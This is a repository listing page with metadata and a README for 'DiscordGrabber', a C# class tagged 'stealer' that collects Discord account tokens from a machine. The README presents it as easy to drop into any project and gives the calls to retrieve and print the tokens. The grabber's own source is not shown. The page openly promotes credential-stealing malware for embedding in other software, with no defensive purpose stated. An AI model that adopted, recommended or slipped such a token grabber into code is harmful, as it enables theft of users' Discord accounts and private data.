https://github.com/moistcoder/discordgrabber
Private use C# Discord Token grabber class that anyone can easily add to their projects
https://github.com/moistcoder/discordgrabber
c c-sharp coder csharp dc discord get grabber moist moistcoder sharp stealer token utility
Last synced: 6 months ago
JSON representation
Private use C# Discord Token grabber class that anyone can easily add to their projects
- Host: GitHub
- URL: https://github.com/moistcoder/discordgrabber
- Owner: MoistCoder
- License: mit
- Created: 2022-03-05T00:12:56.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-03-05T01:04:58.000Z (over 3 years ago)
- Last Synced: 2025-04-30T05:03:12.176Z (6 months ago)
- Topics: c, c-sharp, coder, csharp, dc, discord, get, grabber, moist, moistcoder, sharp, stealer, token, utility
- Language: C#
- Homepage:
- Size: 6.84 KB
- Stars: 11
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# DiscordGrabber
DiscordGrabber is a C# class that makes the collection of Discord Tokens really easy. I use this class for many of my projects.
The Original code is from Nyxonn ([C4ndyGrabber](https://github.com/Nyxonn/c4ndyGrabber)).
I modified it for easier private use and implementation.## Usage
Just add the DiscordGrabber.cs file in your Project and call:
```cs
DiscordGrabber.GetTokens();
```### Example
This will output all found tokens in a console window:
```cs
foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);
```